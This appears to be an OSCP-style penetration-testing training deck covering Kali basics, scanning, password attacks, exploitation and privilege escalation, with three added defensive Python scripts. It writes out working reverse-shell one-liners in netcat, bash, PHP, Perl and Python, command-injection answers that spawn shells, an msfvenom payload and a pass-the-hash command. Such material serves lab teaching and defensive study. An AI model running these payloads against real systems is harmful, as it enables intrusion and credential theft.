OSCP Training - 01

The document outlines an agenda for basic penetration testing training with Kali Linux. It covers topics such as basic commands, information gathering, scanning, enumeration, password attacks, exploitation, and privilege escalation. Each section provides examples of commands and tools to use for tasks like network scanning with Nmap, password cracking with Hydra and John, reverse shells with Metasploit, and local privilege escalation. The document also includes examples of exercises like using Metasploit to exploit vulnerabilities and gaining initial access.

Uploaded by fa1c0n king

OSCP Training

Basic Penetration Testing with Kali Linux

Agenda
Introduction
Part I : Basic Command for Penetration tester
Part II : Information Gathering
Part III : Scanning
Part IV : Enumeration
Part V : Pre-Exploitation Password Attack
Part VI : Exploitation
Part VII : Privilege Escalation
Part VIII : Post-Exploitation
Introduction
Part I : Basic Command for Penetration tester
Kali Linux
Update and Upgrade Kali
#Checking apt source
kali# nano /etc/apt/sources.list

#Update and Upgrade Kali
kali# apt-get update
kali# apt-get upgrade
Create a web server on Kali so the target can download files from it
#Python (SimpleHTTPServer is the Python 2 module; Python 3 ships the same thing as http.server)
kali# python -m SimpleHTTPServer
kali# python -m SimpleHTTPServer 8000
Connection testing with netcat
#Binding (the victim listens, the tester connects in; -e requires a netcat build with exec support such as nc.traditional or ncat)

Tester: 10.10.10.20    Victim: 10.10.10.10

kali# nc 10.10.10.10 4444

[Windows OS]
C:\>nc.exe -vnlp 4444 -e cmd.exe

[Unix OS]
root# nc -vnlp 4444 -e /bin/bash
Connection testing with netcat
#Reverse (the tester listens, the victim connects back out)

Tester: 10.10.10.20    Victim: 10.10.10.10

kali# nc -vnlp 4444

[Windows OS]
C:\>nc.exe 10.10.10.20 4444 -e cmd.exe

[Unix OS]
root# nc 10.10.10.20 4444 -e /bin/bash
Connection testing with netcat
#Upload File (tester pushes file.txt to a listener on the victim)

Tester: 10.10.10.20    Victim: 10.10.10.10

kali# nc 10.10.10.10 4444 < file.txt

[Windows OS]
C:\>nc.exe -vnlp 4444 > file.txt

[Unix OS]
root# nc -vnlp 4444 > file.txt

Connection testing with netcat
#Download File (victim serves file.txt from a listener, tester pulls it)

Tester: 10.10.10.20    Victim: 10.10.10.10

kali# nc 10.10.10.10 4444 > file.txt

[Windows OS]
C:\>nc.exe -vnlp 4444 < file.txt

[Unix OS]
root# nc -vnlp 4444 < file.txt
Reverse shell
#Reverse

Tester: 10.10.10.20    Victim: 192.168.0.10

kali# nc -vnlp 443

#Netcat-reverse shell
nc 10.10.10.20 443 -e /bin/sh

#Bash-reverse shell
bash -i >& /dev/tcp/10.10.10.20/443 0>&1

#PHP-reverse shell
php -r '$sock=fsockopen("10.10.10.20",443);exec("/bin/sh -i <&3 >&3 2>&3");'

#Perl-reverse shell
perl -e 'use Socket;$i="10.10.10.20";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

#Python-reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.20",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Reverse shell generator website: https://www.revshells.com/
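Every one-liner above ends up the same way on the victim: a shell process whose stdin, stdout and stderr are all a TCP socket instead of a tty or pipe. That is also what a defender looks for. The following Python is an added example, not part of the training deck: it checks each process's fd 0, 1 and 2 (read from /proc on Linux) and reports any shell whose three standard descriptors are sockets. The record shape, the shell-name list and the sample process table are constructed for this example.

```python
import os
import re

# Shells whose standard descriptors should be a tty or a pipe; a socket on all three is the
# signature left by nc -e, bash >& /dev/tcp, and the perl/python wrappers that exec /bin/sh -i.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ash", "ksh"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")   # format of /proc/<pid>/fd/N symlinks to sockets


def is_socket_backed_shell(proc):
    """True when proc is a shell and fds 0, 1 and 2 all point at a socket.

    proc is a dict {"pid": int, "exe": str, "fds": {0: str, 1: str, 2: str}}.
    """
    if os.path.basename(proc["exe"]) not in SHELL_NAMES:
        return False
    fds = proc["fds"]
    return all(SOCKET_RE.match(fds.get(n, "")) for n in (0, 1, 2))


def find_socket_shells(procs):
    """Return the sorted pids of all socket-backed shells in a process table."""
    return sorted(p["pid"] for p in procs if is_socket_backed_shell(p))


def collect_proc():
    """Build the process table from /proc (Linux only; other users' fds need root)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            exe = os.readlink(f"/proc/{entry}/exe")
            fds = {n: os.readlink(f"/proc/{entry}/fd/{n}") for n in (0, 1, 2)}
        except OSError:
            continue  # process exited, kernel thread, or not permitted
        procs.append({"pid": int(entry), "exe": exe, "fds": fds})
    return procs


# Constructed sample table (not real /proc data). 2330 is what the python one-liner's
# "/bin/sh -i" child looks like on Debian, where /bin/sh resolves to dash; 2331 is the
# python parent that dup2'd the socket onto its own 0/1/2 and is deliberately not flagged.
SAMPLE_PROCS = [
    {"pid": 1201, "exe": "/usr/bin/bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    {"pid": 2330, "exe": "/usr/bin/dash", "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    {"pid": 2331, "exe": "/usr/bin/python2.7", "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    {"pid": 2402, "exe": "/usr/sbin/sshd", "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}},
]

if __name__ == "__main__":
    table = collect_proc() if os.path.isdir("/proc") else SAMPLE_PROCS
    for pid in find_socket_shells(table):
        print(f"pid {pid}: shell with all standard descriptors on a socket")
```

The check is deliberately narrow: it does not flag the python or perl wrapper itself, only the interactive shell it hands the socket to, and it says nothing about where the socket goes. Pairing the flagged pid with `ss -tnp` (or `/proc/net/tcp`) gives the remote address, which for the deck's scenario would be the tester's listener on port 443.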


LAB : reverse shell in example scenario
Use Metasploitable 2 as victim
▪ access http://192.168.31.159/dvwa/login.php with admin/password
▪ Set DVWA security to LOW
▪ use command execution lab as the vulnerability
Use Kali as Tester to listen to victim and try reverse shell by using
▪ Netcat
▪ Bash
▪ Php
▪ Perl
▪ python

Hint:

Answer:
127.0.0.1 && nc 192.168.31.132 443 -e /bin/sh

127.0.0.1 && php -r '$sock=fsockopen("192.168.31.132",443);exec("/bin/sh -i <&3 >&3 2>&3");'
Part II : Information Gathering
Information gathering
#Other ways
Google: http://www.google.com
DNSdumpster: https://dnsdumpster.com/
Network tools: https://network-tools.com/
Shodan: https://www.shodan.io
Netcraft: https://www.netcraft.com/
Web Archive: http://web.archive.org
Information gathering
#Internal Network Information gathering (Passive mode)

Tcpdump
#filter out traffic involving the tester's own address (192.168.31.132)
kali# tcpdump -i eth0 -vv | grep -v 192.168.31.132
kali# tcpdump -i eth0 -w outfile.pcap

Tshark
kali# tshark

Information gathering
#tcpdump
#tshark
Capture Packets with Tshark
tshark -i eth0 -w capture-output.pcap

Read a Pcap with Tshark
tshark -r capture-output.pcap

HTTP Analysis with Tshark (one line per request, fields separated by a tab)
tshark -i eth0 -Y http.request -T fields -e http.host -e http.user_agent
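The `-T fields` output above is just tab-separated text, so it is easy to post-process. The script below is an added example, not from the deck: it parses that output, counts requests per host and per user agent, and flags agents that belong to scanners or scripted clients rather than browsers (Nikto's own user agent, curl, python-requests). The sample lines and the marker list are constructed for the example and should be tuned to the environment being watched.

```python
import sys
from collections import Counter

# Substrings of User-Agent values that usually mean a tool, not a person (assumption: extend as needed).
TOOL_MARKERS = ("Nikto", "curl/", "python-requests", "sqlmap")


def parse_fields_output(lines):
    """Parse `tshark -T fields -e http.host -e http.user_agent` output into (host, agent) pairs.

    tshark emits one line per matching packet with the fields tab-separated; a field that is absent
    is left empty, so a request without a User-Agent header yields ("host", "").
    """
    records = []
    for line in lines:
        line = line.rstrip("\n")
        if not line.strip():
            continue
        parts = line.split("\t")
        host = parts[0] if len(parts) > 0 else ""
        agent = parts[1] if len(parts) > 1 else ""
        records.append((host, agent))
    return records


def summarize(records):
    """Return (requests per host, requests per user agent); an empty agent is counted as <none>."""
    hosts = Counter(host for host, _ in records)
    agents = Counter(agent or "<none>" for _, agent in records)
    return hosts, agents


def flag_tool_agents(records, markers=TOOL_MARKERS):
    """Return (host, agent, marker) for every request whose agent contains a tool marker."""
    flagged = []
    for host, agent in records:
        marker = next((m for m in markers if m in agent), None)
        if marker:
            flagged.append((host, agent, marker))
    return flagged


# Constructed sample of tshark output (hostnames and agents are made up for this example).
SAMPLE_OUTPUT = [
    "intranet.example.test\tMozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0",
    "intranet.example.test\tMozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)",
    "intranet.example.test\tcurl/7.88.1",
    "updates.example.test\t",
    "intranet.example.test\tMozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0",
    "",
]

if __name__ == "__main__":
    # Pipe real tshark output in (tshark ... | python3 this.py); otherwise the sample is used.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_OUTPUT
    recs = parse_fields_output(source)
    hosts, agents = summarize(recs)
    print("requests per host:", dict(hosts))
    print("requests per agent:", dict(agents))
    for host, agent, marker in flag_tool_agents(recs):
        print(f"tool traffic to {host}: {agent!r} (matched {marker!r})")
```

Two tshark details the parser relies on: it expects no header line (do not add `-E header=y`), and when a packet carries a field more than once tshark joins the values with a comma in the same column, which this parser keeps as a single string.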
Information gathering
#wireshark
Information gathering
#responder
kali# sudo responder -I eth0 -wrf
Part III : Scanning
Scanning
#Network Scanning with nmap
Scanning
#Network Scanning with Zenmap
Scanning
#Network Scanning with arp-scan
kali# arp-scan 192.168.31.0/24
Web Scanning
#Basic web scanning by Nikto
kali# nikto -h http://victim.com
kali# nikto -h https://victim.com:443
Web Scanning
#Basic web path enumeration with dirb
kali# dirb http://victim.com
Web Scanning
#Basic web path enumeration with dirbuster
Part IV : Enumeration
What is Enumeration?
Enumeration
#Basic Enumeration by searchsploit
kali# searchsploit keyword
Enumeration
#Basic Enumeration by Exploit-DB web
Part V : Pre-Exploitation Password Attack
Password Attack
#Basic password attack by hydra
kali# gzip -d /usr/share/wordlists/rockyou.txt.gz
kali# hydra 192.168.1.1 ssh -l <login-name> -P <wordlist> -s 22 -vV
kali# hydra 10.10.1.131 telnet -l root -P pass.txt
Password Attack
# Hashcat
Password Attack
# John
Part VI : Exploitation
Exploitation
#Basic Exploitation by Metasploit
Exploitation: Badblue
Exploitation: CI Server
Exploitation
#Basic Network device exploitation with routersploit
kali# git clone https://github.com/reverse-shell/routersploit.git
kali# cd routersploit/
kali:~/routersploit# python3 rsf.py
Exploitation
#Basic Exploitation by Metasploit
#Binding: Tester connects to Victim
#Reverse: Victim connects back to Tester
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.117.137 LPORT=5555 -f exe -o reverseshell.exe
kali# python -m SimpleHTTPServer 8000

At target (Windows 7) access http://192.168.117.136:8000/
Download and run the file
Part VII : Privilege Escalation
Privilege Escalation
#UNIX #WINDOWS
Privilege Escalation
#Local Privilege Escalation with Metasploit
Download BeRoot tools for Privilege Escalation
https://github.com/AlessandroZ/BeRoot/releases
Run file beRoot.exe
>beRoot.exe
Part VIII : Post-Exploitation
Post Exploitation
#hashdump
Copy the dumped hashes to a file (hash.txt)
Post Exploitation
#Crack with John the Ripper
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Post Exploitation: Enabling Remote Desktop
Post Exploitation
#Pass the hash
pth-winexe -U administrator%"aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42" //192.168.200.132 cmd.exe
Post Exploitation
#Token Impersonation
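The string handed to pth-winexe above is the LM hash and the NT hash of the account joined by a colon, exactly as hashdump prints them in `user:rid:LM:NT:::`. Reading those fields correctly is also how a defender audits a hashdump of their own hosts. The script below is an added example (not from the deck): it parses both the `USER%LM:NT` form and hashdump lines, validates the two 32-hex-character halves, and reports two hygiene findings: an LM half that is not the well-known empty-LM value (meaning the host still stores LM hashes) and an NT half equal to the empty-password NT hash (a blank password). The Administrator line reuses the hash pair from the deck; the other hashdump lines are constructed for the example.

```python
import re

# LM hash of an empty password: this is what hashdump shows in the LM column when LM storage is off.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of an empty password: an account showing this has a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")


def _check_pair(lm, nt):
    lm, nt = lm.lower(), nt.lower()
    if not HEX32.match(lm) or not HEX32.match(nt):
        raise ValueError("LM and NT hashes must each be 32 hex characters")
    return lm, nt


def parse_pth_credential(spec):
    """Parse the USER%LMHASH:NTHASH string used with pth-winexe -U (quotes around the hashes allowed)."""
    user, sep, hashes = spec.partition("%")
    if not sep or not user:
        raise ValueError("expected USER%LMHASH:NTHASH")
    lm, sep2, nt = hashes.strip('"').partition(":")
    if not sep2:
        raise ValueError("expected LMHASH:NTHASH after %")
    lm, nt = _check_pair(lm, nt)
    return {"user": user, "lm": lm, "nt": nt}


def parse_hashdump_line(line):
    """Parse one hashdump line of the form user:rid:LM:NT::: into a dict."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("expected user:rid:LM:NT:::")
    user, rid, lm, nt = parts[:4]
    lm, nt = _check_pair(lm, nt)
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt}


def assess(cred):
    """Return the list of hygiene findings for one parsed credential (empty list means nothing to report)."""
    findings = []
    if cred["lm"] != EMPTY_LM:
        findings.append("LM hash stored (legacy LM hashing still enabled)")
    if cred["nt"] == EMPTY_NT:
        findings.append("blank password")
    return findings


def audit_hashdump(lines):
    """Map each account that has findings to its findings; accounts with none are omitted."""
    report = {}
    for line in lines:
        if not line.strip():
            continue
        cred = parse_hashdump_line(line)
        findings = assess(cred)
        if findings:
            report[cred["user"]] = findings
    return report


# Constructed hashdump excerpt. Administrator reuses the deck's hash pair; Guest and legacy_svc are made up.
SAMPLE_HASHDUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "legacy_svc:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::",
]

if __name__ == "__main__":
    for user, findings in audit_hashdump(SAMPLE_HASHDUMP).items():
        print(f"{user}: {'; '.join(findings)}")
```

The reason the LM check matters for the john command above: `--format=NT` cracks only the NT half, and a stored LM hash (case-insensitive, split into two 7-character halves) is far cheaper to crack, so any account the audit flags for LM storage should have that setting fixed and the password changed.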
Hack The Box | Previse

Connect VPN

Hack The Box

Player
OS : Kali Linux
OS : Linux
Hack The Box
Scan
Nmap - Port Scan
Enumeration
gobuster
Dirbuster
Exploit
Exploring the Admin Area and Source Code
netcat to my own machine
brute-forcing password
Privilege Escalation
SUID
GitHub
git init --> Initialize a local Git repository
git clone --> Create a local copy of a remote repository
git clean --> Removes untracked files from the working directory
git commit --> Takes the staged snapshot and commits it to the project history
Pentest website list
https://www.exploit-db.com
https://www.revshells.com
https://guif.re/
https://gtfobins.github.io/
https://oscpnotes.infosecsanyam.in/
https://oscp.infosecsanyam.in/
